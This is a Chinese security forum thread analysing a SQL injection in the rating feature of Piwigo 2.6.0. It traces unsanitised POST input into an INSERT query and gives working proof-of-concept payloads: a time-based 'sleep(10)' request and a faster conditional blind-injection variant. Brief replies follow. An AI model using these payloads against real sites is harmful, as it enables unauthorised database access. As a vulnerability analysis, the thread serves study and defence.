请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 689|回复: 4

Piwigo 2.6.0 SQL Injection 分析

[复制链接]
  • TA的每日心情

    2017-3-8 14:26
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2016-6-26 01:59:57 | 显示全部楼层 |阅读模式

    安装好piwigo2.6.0之后,直接测试,发现不行,跳转到上传页面,在picture.php前几行插入了几个var_dump语句,发现程序并没有走到下面,所以先上传一张图片。再次测试时,发现是对图片的一个评分功能。 简单跟踪一下。
    Poc如下,post请求
    [AppleScript] 纯文本查看 复制代码
    http://target/piwigo260/picture.php?/1/category/1&action=rate
    rate=1 and sleep(10)

    查看/picture.php,直接搜索rate, 在326行找到
    [PHP] 纯文本查看 复制代码
      case 'rate' :
        {
          include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
          rate_picture($page['image_id'], $_POST['rate']);
          redirect($url_self);
        }

    包含了另外一个文件,然后调用了rate_picture函数,并且直接传递的post参数。
    查看/include/functions_rate.inc.php
    [PHP] 纯文本查看 复制代码
    function rate_picture($image_id, $rate)


    搜索rate参数,对于中间不知道值的变量,我们使用var_dump($aaa);exit();来查看该值,
    最终我们在119行,看到$rate拼接到注入语句中,
    [SQL] 纯文本查看 复制代码
    $query = '
    INSERT
      INTO '.RATE_TABLE.'
      (user_id,anonymous_id,element_id,rate,date)
      VALUES
      ('
        .$user['id'].','
        .'\''.$anonymous_id.'\','
        .$image_id.','
        .$rate
        .',NOW())
    ;';//var_dump($query);exit();
      pwg_query($query);
    
    我们打印该查询语句
    [SQL] 纯文本查看 复制代码
    INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (2,'*.*.*',1,1 and sleep(10),NOW()) ;
    


    发现我们的语句已经插入到该查询中,insert注入。由于这里没有报错信息,不能使用报错注入的技巧,所有只能盲注了。
    一种是像上面那样使用时间盲注,这种比较慢。另外一种会快一些,感兴趣的可以找一找有没有快一点的方法。
    http://target/piwigo260/picture.php?/1/category/1&action=rate
    rate=1%2b if(1=2,1,4)


    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    5 天前
  • 签到天数: 337 天

    [LV.8]以坛为家I

    发表于 2016-6-26 22:26:43 | 显示全部楼层
       流弊流弊
  • TA的每日心情
    无聊
    3 天前
  • 签到天数: 221 天

    [LV.7]常住居民III

    发表于 2016-6-27 09:47:57 | 显示全部楼层
    露珠求加QQ
  • TA的每日心情

    2017-3-8 14:26
  • 签到天数: 33 天

    [LV.5]常住居民I

     楼主| 发表于 2016-6-27 13:24:08 | 显示全部楼层

    暂时没有QQ
  • TA的每日心情
    奋斗
    2017-1-21 20:52
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2016-7-31 08:40:06 | 显示全部楼层
    学习一下
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-30 20:40 , Processed in 0.226899 second(s), 32 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表